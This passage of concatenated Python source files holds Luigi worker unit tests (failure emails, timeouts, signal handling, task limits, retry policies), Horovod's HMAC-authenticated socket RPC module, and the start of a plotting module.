        luigi.build([SendSignalTask(signal.SIGKILL)], workers=2, local_scheduler=True)
        self.assertEqual([], emails)

    @email_patch
    def test_task_times_out(self, emails):
        class A(luigi.Task):
            worker_timeout = 0.0001

            def run(self):
                time.sleep(5)
        a = A()
        luigi.build([a], workers=2, local_scheduler=True)
        self.assertEqual(1, len(emails))
        subject, body = self.read_email(emails[0])
        self.assertIn("Luigi: %s FAILED" % (a,), subject)
        self.assertIn("timed out after 0.0001 seconds and was terminated.", body)

    @with_config({'worker': {'send_failure_email': 'False'}})
    @email_patch
    def test_task_times_out_no_email(self, emails):
        class A(luigi.Task):
            worker_timeout = 0.0001

            def run(self):
                time.sleep(5)
        luigi.build([A()], workers=2, local_scheduler=True)
        self.assertEqual([], emails)

    @with_config(dict(worker=dict(retry_external_tasks='true')))
    @email_patch
    def test_external_task_retries(self, emails):
        """
        Test that we do not send error emails on the failures of external tasks
        """
        class A(luigi.ExternalTask):
            pass
        a = A()
        luigi.build([a], workers=2, local_scheduler=True)
        self.assertEqual(emails, [])

    @email_patch
    def test_no_error(self, emails):
        class A(DummyTask):
            pass
        a = A()
        self.assertEqual(emails, [])
        self.worker.add(a)
        self.assertEqual(emails, [])
        self.worker.run()
        self.assertEqual(emails, [])
        self.assertTrue(a.complete())

    @custom_email_patch({"email": {"receiver": "not-a-real-email-address-for-test-only", 'format': 'none'}})
    def test_disable_emails(self, emails):
        class A(luigi.Task):
            def complete(self):
                raise Exception("b0rk")
        self.worker.add(A())
        self.assertEqual(emails, [])
class RaiseSystemExit(luigi.Task):
    # Task whose run() raises SystemExit, to check workers do not hang on it.
    def run(self):
        raise SystemExit("System exit!!")
class SendSignalTask(luigi.Task):
    # Task that sends the given signal number to its own (task) process.
    signal = luigi.IntParameter()

    def run(self):
        os.kill(os.getpid(), self.signal)
class HangTheWorkerTask(luigi.Task):
    # Busy-loops forever; worker_timeout (seconds) lets tests terminate it.
    worker_timeout = luigi.IntParameter(default=None)

    def run(self):
        # Spin forever; only an external timeout/kill stops this task.
        while True:
            pass

    def complete(self):
        return False
class MultipleWorkersTest(unittest.TestCase):

    @unittest.skip('Always skip. There are many intermittent failures')
    # This pass under python3 when run as `nosetests test/worker_test.py`
    # but not as `nosetests test`. Probably some side effect on previous tests
    @unittest.skipIf(six.PY3, 'This test fail on python3 when run with tox.')
    def test_multiple_workers(self):
        # Test using multiple workers. Classes are generated dynamically since
        # this may reflect issues with how multiprocessing is implemented:
        # os.fork is fine, but dynamic classes can't be pickled, so spawn-based
        # implementations may fail.
        class MyDynamicTask(luigi.Task):
            x = luigi.Parameter()

            def run(self):
                time.sleep(0.1)

        start = time.time()
        luigi.build([MyDynamicTask(i) for i in range(100)], workers=100, local_scheduler=True)
        # should ideally take exactly 0.1s, but definitely less than 10.0
        self.assertTrue(time.time() < start + 5.0)

    def test_zero_workers(self):
        task = DummyTask()
        luigi.build([task], workers=0, local_scheduler=True)
        self.assertFalse(task.complete())

    def test_system_exit(self):
        # This would hang indefinitely before this fix:
        # https://github.com/spotify/luigi/pull/439
        luigi.build([RaiseSystemExit()], workers=2, local_scheduler=True)

    def test_term_worker(self):
        luigi.build([SendSignalTask(signal.SIGTERM)], workers=2, local_scheduler=True)

    def test_kill_worker(self):
        luigi.build([SendSignalTask(signal.SIGKILL)], workers=2, local_scheduler=True)

    def test_purge_multiple_workers(self):
        worker = Worker(worker_processes=2, wait_interval=0.01)
        term_task = SendSignalTask(signal.SIGTERM)
        kill_task = SendSignalTask(signal.SIGKILL)
        worker.add(term_task)
        worker.add(kill_task)
        worker._run_task(term_task.task_id)
        worker._run_task(kill_task.task_id)
        time.sleep(1.0)

        worker._handle_next_task()
        worker._handle_next_task()
        worker._handle_next_task()

    def test_stop_worker_kills_subprocesses(self):
        with Worker(worker_processes=2) as w:
            hung_task = HangTheWorkerTask()
            w.add(hung_task)
            w._run_task(hung_task.task_id)
            pids = [p.pid for p in w._running_tasks.values()]
            self.assertEqual(1, len(pids))
            pid = pids[0]

            def is_running():
                return pid in {p.pid for p in psutil.Process().children()}

            self.assertTrue(is_running())
        # NOTE(review): placed outside the `with` so the worker's context exit
        # has stopped the subprocess — confirm against upstream layout.
        self.assertFalse(is_running())

    @mock.patch('luigi.worker.time')
    def test_no_process_leak_from_repeatedly_running_same_task(self, worker_time):
        with Worker(worker_processes=2) as w:
            hung_task = HangTheWorkerTask()
            w.add(hung_task)
            w._run_task(hung_task.task_id)
            children = set(psutil.Process().children())
            # repeatedly try to run the same task id
            for _ in range(10):
                worker_time.sleep.reset_mock()
                w._run_task(hung_task.task_id)
                # should sleep after each attempt
                worker_time.sleep.assert_called_once_with(mock.ANY)
            # only one process should be running
            self.assertEqual(children, set(psutil.Process().children()))

    def test_time_out_hung_worker(self):
        luigi.build([HangTheWorkerTask(0.1)], workers=2, local_scheduler=True)

    def test_time_out_hung_single_worker(self):
        luigi.build([HangTheWorkerTask(0.1)], workers=1, local_scheduler=True)

    @skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/72953986')
    @mock.patch('luigi.worker.time')
    def test_purge_hung_worker_default_timeout_time(self, mock_time):
        w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
        mock_time.time.return_value = 0
        task = HangTheWorkerTask()
        w.add(task)
        w._run_task(task.task_id)

        # At exactly the 5s default timeout the task is still considered alive.
        mock_time.time.return_value = 5
        w._handle_next_task()
        self.assertEqual(1, len(w._running_tasks))

        # One second past the timeout it gets purged.
        mock_time.time.return_value = 6
        w._handle_next_task()
        self.assertEqual(0, len(w._running_tasks))

    @skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/76645264')
    @mock.patch('luigi.worker.time')
    def test_purge_hung_worker_override_timeout_time(self, mock_time):
        w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
        mock_time.time.return_value = 0
        # The per-task worker_timeout (10s) overrides the worker default (5s).
        task = HangTheWorkerTask(worker_timeout=10)
        w.add(task)
        w._run_task(task.task_id)

        mock_time.time.return_value = 10
        w._handle_next_task()
        self.assertEqual(1, len(w._running_tasks))

        mock_time.time.return_value = 11
        w._handle_next_task()
        self.assertEqual(0, len(w._running_tasks))
class Dummy2Task(Task):
    """Writes the string 'test' to a MockTarget named by parameter ``p``."""

    p = luigi.Parameter()

    def output(self):
        return MockTarget(self.p)

    def run(self):
        f = self.output().open('w')
        f.write('test')
        f.close()
class AssistantTest(unittest.TestCase):
    def run(self, result=None):
        # Build a fresh scheduler, assistant worker and regular worker around
        # every test execution.
        self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
        self.assistant = Worker(scheduler=self.sch, worker_id='Y', assistant=True)
        with Worker(scheduler=self.sch, worker_id='X') as w:
            self.w = w
            super(AssistantTest, self).run(result)

    def test_get_work(self):
        task = Dummy2Task('123')
        self.w.add(task)
        self.assertFalse(task.complete())
        self.assistant.run()
        self.assertTrue(task.complete())

    def test_bad_job_type(self):
        class Dummy3Task(Dummy2Task):
            task_family = 'UnknownTaskFamily'

        task = Dummy3Task('123')
        self.w.add(task)
        self.assertFalse(task.complete())
        self.assertFalse(self.assistant.run())
        self.assertFalse(task.complete())
        self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])

    def test_unimported_job_type(self):
        # NOTE(review): internal indentation of this module literal was
        # reconstructed — it must be valid importable Python.
        MODULE_CONTENTS = b'''
import luigi


class UnimportedTask(luigi.Task):
    def complete(self):
        return False
'''
        reg = luigi.task_register.Register._get_reg()

        class UnimportedTask(luigi.Task):
            task_module = None  # Set it here, so it's generally settable

        luigi.task_register.Register._set_reg(reg)
        task = UnimportedTask()

        # verify that it can't run the task without the module info necessary to import it
        self.w.add(task)
        self.assertFalse(self.assistant.run())
        self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])

        # check that it can import with the right module
        with temporary_unloaded_module(MODULE_CONTENTS) as task.task_module:
            self.w.add(task)
            self.assertTrue(self.assistant.run())
            self.assertEqual(list(self.sch.task_list('DONE', '').keys()), [task.task_id])

    def test_unimported_job_sends_failure_message(self):
        class NotInAssistantTask(luigi.Task):
            task_family = 'Unknown'
            task_module = None

        task = NotInAssistantTask()
        self.w.add(task)
        self.assertFalse(self.assistant.run())
        self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])
        self.assertTrue(self.sch.fetch_error(task.task_id)['error'])
class ForkBombTask(luigi.Task):
    """Recursively requires ``breadth`` copies of itself down to ``depth`` levels."""

    depth = luigi.IntParameter()
    breadth = luigi.IntParameter()
    p = luigi.Parameter(default=(0, ))  # ehm for some weird reason [0] becomes a tuple...?

    def output(self):
        return MockTarget('.'.join(map(str, self.p)))

    def run(self):
        with self.output().open('w') as f:
            f.write('Done!')

    def requires(self):
        if len(self.p) < self.depth:
            for i in range(self.breadth):
                yield ForkBombTask(self.depth, self.breadth, self.p + (i, ))
class TaskLimitTest(unittest.TestCase):
    def tearDown(self):
        MockFileSystem().remove('')

    @with_config({'worker': {'task_limit': '6'}})
    def test_task_limit_exceeded(self):
        # A (3, 2) fork bomb needs 7 tasks; a limit of 6 leaves one leaf unscheduled.
        worker = Worker()
        root = ForkBombTask(3, 2)
        worker.add(root)
        worker.run()
        self.assertFalse(root.complete())
        leaf_tasks = [ForkBombTask(3, 2, branch) for branch in [(0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1)]]
        self.assertEqual(3, sum(t.complete() for t in leaf_tasks),
                         "should have gracefully completed as much as possible even though the single last leaf didn't get scheduled")

    @with_config({'worker': {'task_limit': '7'}})
    def test_task_limit_not_exceeded(self):
        worker = Worker()
        root = ForkBombTask(3, 2)
        worker.add(root)
        worker.run()
        self.assertTrue(root.complete())

    def test_no_task_limit(self):
        worker = Worker()
        root = ForkBombTask(4, 2)
        worker.add(root)
        worker.run()
        self.assertTrue(root.complete())
class WorkerConfigurationTest(unittest.TestCase):

    def test_asserts_for_worker(self):
        """
        Test that Worker() asserts that it's sanely configured
        """
        Worker(wait_interval=1)  # This shouldn't raise
        self.assertRaises(AssertionError, Worker, wait_interval=0)
class WorkerWaitJitterTest(unittest.TestCase):
    @with_config({'worker': {'wait_jitter': '10.0'}})
    @mock.patch("random.uniform")
    @mock.patch("time.sleep")
    def test_wait_jitter(self, mock_sleep, mock_random):
        """ verify configured jitter amount """
        mock_random.return_value = 1.0

        worker = Worker()
        sleeper = worker._sleeper()
        six.next(sleeper)
        # sleep time = wait_interval + uniform(0, wait_jitter)
        mock_random.assert_called_with(0, 10.0)
        mock_sleep.assert_called_with(2.0)

        mock_random.return_value = 2.0
        six.next(sleeper)
        mock_random.assert_called_with(0, 10.0)
        mock_sleep.assert_called_with(3.0)

    @mock.patch("random.uniform")
    @mock.patch("time.sleep")
    def test_wait_jitter_default(self, mock_sleep, mock_random):
        """ verify default jitter is as expected """
        mock_random.return_value = 1.0

        worker = Worker()
        sleeper = worker._sleeper()
        six.next(sleeper)
        mock_random.assert_called_with(0, 5.0)
        mock_sleep.assert_called_with(2.0)

        mock_random.return_value = 3.3
        six.next(sleeper)
        mock_random.assert_called_with(0, 5.0)
        mock_sleep.assert_called_with(4.3)
class KeyboardInterruptBehaviorTest(LuigiTestCase):

    def test_propagation_when_executing(self):
        """
        Ensure that keyboard interrupts causes luigi to quit when you are
        executing tasks.

        TODO: Add a test that tests the multiprocessing (--worker >1) case
        """
        class KeyboardInterruptTask(luigi.Task):
            def run(self):
                raise KeyboardInterrupt()

        cmd = 'KeyboardInterruptTask --local-scheduler --no-lock'.split(' ')
        self.assertRaises(KeyboardInterrupt, luigi_run, cmd)

    def test_propagation_when_scheduling(self):
        """
        Test that KeyboardInterrupt causes luigi to quit while scheduling.
        """
        class KeyboardInterruptTask(luigi.Task):
            def complete(self):
                raise KeyboardInterrupt()

        class ExternalKeyboardInterruptTask(luigi.ExternalTask):
            def complete(self):
                raise KeyboardInterrupt()

        self.assertRaises(KeyboardInterrupt, luigi_run,
                          ['KeyboardInterruptTask', '--local-scheduler', '--no-lock'])
        self.assertRaises(KeyboardInterrupt, luigi_run,
                          ['ExternalKeyboardInterruptTask', '--local-scheduler', '--no-lock'])
class WorkerPurgeEventHandlerTest(unittest.TestCase):

    @mock.patch('luigi.worker.ContextManagedTaskProcess')
    def test_process_killed_handler(self, task_proc):
        result = []

        @HangTheWorkerTask.event_handler(Event.PROCESS_FAILURE)
        def store_task(t, error_msg):
            self.assertTrue(error_msg)
            result.append(t)

        w = Worker()
        task = HangTheWorkerTask()
        # Fake a task process that already died, killed by signal 14.
        task_process = mock.MagicMock(is_alive=lambda: False, exitcode=-14, task=task)
        task_proc.return_value = task_process

        w.add(task)
        w._run_task(task.task_id)
        w._handle_next_task()

        self.assertEqual(result, [task])

    @mock.patch('luigi.worker.time')
    def test_timeout_handler(self, mock_time):
        result = []

        @HangTheWorkerTask.event_handler(Event.TIMEOUT)
        def store_task(t, error_msg):
            self.assertTrue(error_msg)
            result.append(t)

        w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
        mock_time.time.return_value = 0
        task = HangTheWorkerTask(worker_timeout=1)
        w.add(task)
        w._run_task(task.task_id)

        # Past the 1s per-task timeout: the TIMEOUT event must fire.
        mock_time.time.return_value = 3
        w._handle_next_task()

        self.assertEqual(result, [task])
class PerTaskRetryPolicyBehaviorTest(LuigiTestCase):
    def setUp(self):
        super(PerTaskRetryPolicyBehaviorTest, self).setUp()
        self.per_task_retry_count = 3
        self.default_retry_count = 1
        self.sch = Scheduler(retry_delay=0.1, retry_count=self.default_retry_count, prune_on_get_work=True)

    def test_with_all_disabled_with_single_worker(self):
        """
        A wrapper task requires two failing tasks.  TestErrorTask1 uses the
        default retry_count (1) while TestErrorTask2 overrides retry_count at
        task level.  Runs on a single worker.
        """
        class TestErrorTask1(DummyErrorTask):
            pass

        e1 = TestErrorTask1()

        class TestErrorTask2(DummyErrorTask):
            retry_count = self.per_task_retry_count

        e2 = TestErrorTask2()

        class TestWrapperTask(luigi.WrapperTask):
            def requires(self):
                return [e2, e1]

        wt = TestWrapperTask()

        with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
            self.assertTrue(w1.add(wt))
            self.assertFalse(w1.run())

            self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
            self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))

            self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
            self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
            self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())

    def test_with_all_disabled_with_multiple_worker(self):
        """
        Same scenario as the single-worker variant, but each task is added by
        a different worker.
        """
        class TestErrorTask1(DummyErrorTask):
            pass

        e1 = TestErrorTask1()

        class TestErrorTask2(DummyErrorTask):
            retry_count = self.per_task_retry_count

        e2 = TestErrorTask2()

        class TestWrapperTask(luigi.WrapperTask):
            def requires(self):
                return [e2, e1]

        wt = TestWrapperTask()

        with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
            with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
                with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w3:
                    self.assertTrue(w1.add(wt))
                    self.assertTrue(w2.add(e2))
                    self.assertTrue(w3.add(e1))

                    self.assertFalse(w3.run())
                    self.assertFalse(w2.run())
                    self.assertTrue(w1.run())

                    self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
                    self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))

                    self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
                    self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
                    self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())

    def test_with_includes_success_with_single_worker(self):
        """
        A wrapper task requires one failing task (with task-level retry_count)
        and one succeeding task.  Runs on a single worker.
        """
        class TestSuccessTask1(DummyTask):
            pass

        s1 = TestSuccessTask1()

        class TestErrorTask1(DummyErrorTask):
            retry_count = self.per_task_retry_count

        e1 = TestErrorTask1()

        class TestWrapperTask(luigi.WrapperTask):
            def requires(self):
                return [e1, s1]

        wt = TestWrapperTask()

        with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
            self.assertTrue(w1.add(wt))
            self.assertFalse(w1.run())

            self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
            self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
            self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))

            self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
            self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
            self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())

    def test_with_includes_success_with_multiple_worker(self):
        """
        Same scenario as the single-worker variant, but each task is added by
        a different worker.
        """
        class TestSuccessTask1(DummyTask):
            pass

        s1 = TestSuccessTask1()

        class TestErrorTask1(DummyErrorTask):
            retry_count = self.per_task_retry_count

        e1 = TestErrorTask1()

        class TestWrapperTask(luigi.WrapperTask):
            def requires(self):
                return [e1, s1]

        wt = TestWrapperTask()

        with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
            with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
                with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w3:
                    self.assertTrue(w1.add(wt))
                    self.assertTrue(w2.add(e1))
                    self.assertTrue(w3.add(s1))

                    self.assertTrue(w3.run())
                    self.assertFalse(w2.run())
                    self.assertTrue(w1.run())

                    self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
                    self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
                    self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))

                    self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
                    self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
                    self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())

    def test_with_dynamic_dependencies_with_single_worker(self):
        """
        The failing tasks are yielded as dynamic dependencies from run().
        TestErrorTask1 uses the default retry_count, TestErrorTask2 overrides
        it at task level.  Runs on a single worker.
        """
        class TestErrorTask1(DummyErrorTask):
            pass

        e1 = TestErrorTask1()

        class TestErrorTask2(DummyErrorTask):
            retry_count = self.per_task_retry_count

        e2 = TestErrorTask2()

        class TestSuccessTask1(DummyTask):
            pass

        s1 = TestSuccessTask1()

        class TestWrapperTask(DummyTask):
            def requires(self):
                return [s1]

            def run(self):
                super(TestWrapperTask, self).run()
                yield e2, e1

        wt = TestWrapperTask()

        with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
            self.assertTrue(w1.add(wt))
            self.assertFalse(w1.run())

            self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
            self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))

            self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
            self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
            self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
            self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())

    def test_with_dynamic_dependencies_with_multiple_workers(self):
        """
        Same dynamic-dependency scenario, with the wrapper and the success
        task added by different workers.
        """
        class TestErrorTask1(DummyErrorTask):
            pass

        e1 = TestErrorTask1()

        class TestErrorTask2(DummyErrorTask):
            retry_count = self.per_task_retry_count

        e2 = TestErrorTask2()

        class TestSuccessTask1(DummyTask):
            pass

        s1 = TestSuccessTask1()

        class TestWrapperTask(DummyTask):
            def requires(self):
                return [s1]

            def run(self):
                super(TestWrapperTask, self).run()
                yield e2, e1

        wt = TestWrapperTask()

        with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
            with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
                self.assertTrue(w1.add(wt))
                self.assertTrue(w2.add(s1))

                self.assertTrue(w2.run())
                self.assertFalse(w1.run())

                self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
                self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))

                self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
                self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
                self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
                self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
|
network.py | # Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import random
import socket
import struct
import threading
import cloudpickle
import psutil
from six.moves import queue, socketserver
from horovod.run.common.util import secret
class PingRequest(object):
    """Marker request asking a service to identify itself."""
    pass
class NoValidAddressesFound(Exception):
    """Raised when a client cannot reach a service on any probed address."""
    pass
class PingResponse(object):
    """Reply to a PingRequest, identifying the service and the caller's IP."""

    def __init__(self, service_name, source_address):
        # Service name that responded to this ping.
        self.service_name = service_name
        # Source IP address that was visible to the service.
        self.source_address = source_address
class AckResponse(object):
    """Used for situations when the response does not carry any data."""
    pass
class Wire(object):
    """
    Used for serialization/deserialization of objects over the wire.

    We use HMAC to protect services from unauthorized use. The key used for
    the HMAC digest is distributed by Open MPI and Spark.

    The objects are serialized using cloudpickle. Serialized objects become
    the body of the message.

    Structure of the message is as follows:
    - HMAC digest of the body (32 bytes)
    - length of the body (4 bytes)
    - body
    """

    def __init__(self, key):
        self._key = key

    def write(self, obj, wfile):
        body = cloudpickle.dumps(obj)
        wfile.write(secret.compute_digest(self._key, body))
        # Pack message length into 4-byte integer.
        wfile.write(struct.pack('i', len(body)))
        wfile.write(body)
        wfile.flush()

    def read(self, rfile):
        digest = rfile.read(secret.DIGEST_LENGTH)
        # Unpack message length from 4-byte integer.
        body_len = struct.unpack('i', rfile.read(4))[0]
        body = rfile.read(body_len)
        # Verify before deserializing: cloudpickle.loads on untrusted bytes
        # would execute arbitrary code.
        if not secret.check_digest(self._key, body, digest):
            raise Exception('Security error: digest did not match the message.')
        return cloudpickle.loads(body)
class BasicService(object):
    """TCP server speaking the `Wire` protocol from a background daemon thread.

    Binds to a random free port on 0.0.0.0 and answers PingRequest with a
    PingResponse; subclasses extend `_handle` for more request types.
    """

    def __init__(self, service_name, key):
        self._service_name = service_name
        self._wire = Wire(key)
        self._server = self._make_server()
        self._port = self._server.socket.getsockname()[1]
        self._thread = threading.Thread(target=self._server.serve_forever)
        self._thread.daemon = True
        self._thread.start()

    def _make_server(self):
        """Bind a ThreadingTCPServer to a random free port in [1024, 65536).

        Starts at a random offset and walks the port range so concurrent
        services don't collide on the same starting port.
        """
        min_port = 1024
        max_port = 65536
        num_ports = max_port - min_port
        start_port = random.randrange(0, num_ports)
        for port_offset in range(num_ports):
            port = min_port + (start_port + port_offset) % num_ports
            try:
                return socketserver.ThreadingTCPServer(('0.0.0.0', port), self._make_handler())
            except socket.error:
                # Port in use or otherwise unbindable; try the next one.
                # Narrowed from a bare `except:` so KeyboardInterrupt /
                # SystemExit and programming errors are not swallowed.
                continue
        raise Exception('Unable to find a port to bind to.')

    def _make_handler(self):
        server = self

        class _Handler(socketserver.StreamRequestHandler):
            def handle(self):
                try:
                    req = server._wire.read(self.rfile)
                    resp = server._handle(req, self.client_address)
                    if not resp:
                        raise Exception('Handler did not return a response.')
                    server._wire.write(resp, self.wfile)
                except EOFError:
                    # Happens when client is abruptly terminated, don't want to pollute the logs.
                    pass

        return _Handler

    def _handle(self, req, client_address):
        """Dispatch one request; subclasses override and fall back to super()."""
        if isinstance(req, PingRequest):
            return PingResponse(self._service_name, client_address[0])
        raise NotImplementedError(req)

    def addresses(self):
        """Return {interface name: [(IPv4 address, port), ...]} for this host."""
        result = {}
        for intf, intf_addresses in psutil.net_if_addrs().items():
            for addr in intf_addresses:
                if addr.family == socket.AF_INET:
                    if intf not in result:
                        result[intf] = []
                    result[intf].append((addr.address, self._port))
        return result

    def shutdown(self):
        self._server.shutdown()
        self._server.server_close()
        self._thread.join()

    def get_port(self):
        return self._port
class BasicClient(object):
    """Client side of `BasicService`: probes candidate addresses, then issues RPCs."""

    def __init__(self, service_name, addresses, key, verbose, match_intf=False,
                 probe_timeout=20, retries=3):
        # Note: because of retry logic, ALL RPC calls are REQUIRED to be idempotent.
        self._verbose = verbose
        self._service_name = service_name
        self._wire = Wire(key)
        self._match_intf = match_intf
        self._probe_timeout = probe_timeout
        self._retries = retries
        self._addresses = self._probe(addresses)
        if not self._addresses:
            raise NoValidAddressesFound(
                'Horovodrun was unable to connect to {service_name} on any '
                'of the following addresses: {addresses}.\n\n'
                'One possible cause of this problem is that '
                'horovodrun currently requires every host to have at '
                'least one routable network interface with the same '
                'name across all of the hosts. '
                'You can run \"ifconfig -a\" '
                'on every host and check for the common '
                'routable interface. '
                'To fix the problem, you can rename interfaces on '
                'Linux.'.format(service_name=service_name, addresses=addresses))

    def _probe(self, addresses):
        """Ping every candidate address in parallel; return only the reachable ones.

        :param addresses: {interface: [(host, port), ...]}
        :return: same shape, restricted to addresses that answered correctly.
        """
        result_queue = queue.Queue()
        threads = []
        for intf, intf_addresses in addresses.items():
            for addr in intf_addresses:
                thread = threading.Thread(target=self._probe_one,
                                          args=(intf, addr, result_queue))
                thread.daemon = True
                thread.start()
                threads.append(thread)
        for t in threads:
            t.join()

        result = {}
        while not result_queue.empty():
            intf, addr = result_queue.get()
            if intf not in result:
                result[intf] = []
            result[intf].append(addr)
        return result

    def _probe_one(self, intf, addr, result_queue):
        """Best-effort ping of a single address; enqueue it when it answers correctly."""
        # `attempt` replaces the original loop variable `iter`, which
        # shadowed the builtin of the same name.
        for attempt in range(self._retries):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self._probe_timeout)
            try:
                sock.connect(addr)
                rfile = sock.makefile('rb')
                wfile = sock.makefile('wb')
                try:
                    self._wire.write(PingRequest(), wfile)
                    resp = self._wire.read(rfile)
                    if resp.service_name != self._service_name:
                        return
                    if self._match_intf:
                        # Interface name of destination and source must match
                        # since `match_intf` is requested.
                        client_intf_addrs = [x.address
                                             for x in psutil.net_if_addrs().get(intf, [])
                                             if x.family == socket.AF_INET]
                        if resp.source_address not in client_intf_addrs:
                            if self._verbose >= 2:
                                # Need to find the local interface name whose
                                # address was visible to the target host's server.
                                resp_intf = ''
                                for key in psutil.net_if_addrs().keys():
                                    key_intf_addrs = [x.address
                                                      for x in psutil.net_if_addrs().get(key, [])]
                                    if resp.source_address in key_intf_addrs:
                                        resp_intf = key
                                        break
                                print('WARNING: Expected to connect the host '
                                      '{addr} using interface '
                                      '{intf}, but reached it on interface '
                                      '{resp_intf}.'.format(
                                          addr=str(addr[0]) + ':' + str(addr[1]),
                                          intf=intf,
                                          resp_intf=resp_intf))
                            return
                    result_queue.put((intf, addr))
                    return
                finally:
                    rfile.close()
                    wfile.close()
            except Exception:
                # Probe failures (unreachable host/port, timeout) are expected
                # and simply retried.  Narrowed from a bare `except:` so
                # KeyboardInterrupt / SystemExit still propagate.
                pass
            finally:
                sock.close()

    def _send_one(self, addr, req):
        """Send one request with retries; re-raise the error on the final attempt."""
        for attempt in range(self._retries):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                sock.connect(addr)
                rfile = sock.makefile('rb')
                wfile = sock.makefile('wb')
                try:
                    self._wire.write(req, wfile)
                    resp = self._wire.read(rfile)
                    return resp
                finally:
                    rfile.close()
                    wfile.close()
            except Exception:
                # Narrowed from a bare `except:`; see _probe_one.
                if attempt == self._retries - 1:
                    # Raise exception on the last retry.
                    raise
            finally:
                sock.close()

    def _send(self, req):
        # Since all the addresses were vetted, use the first one.
        addr = list(self._addresses.values())[0][0]
        return self._send_one(addr, req)

    def addresses(self):
        return self._addresses
|
plot.py | import multiprocessing as mp
from copy import copy
import numpy as np
import tkinter
import pickle
import os
from itertools import accumulate
from matplotlib import pyplot as plt, lines
from casadi import Callback, nlpsol_out, nlpsol_n_out, Sparsity
from ..misc.data import Data
from ..misc.enums import PlotType, ControlType, InterpolationType
from ..misc.mapping import Mapping
from ..misc.utils import check_version
class CustomPlot:
    """
    Descriptor for a user-defined plot.

    :param update_function: Function to plot.
    :param plot_type: Type of plot. (PLOT = 0, INTEGRATED = 1 or STEP = 2)
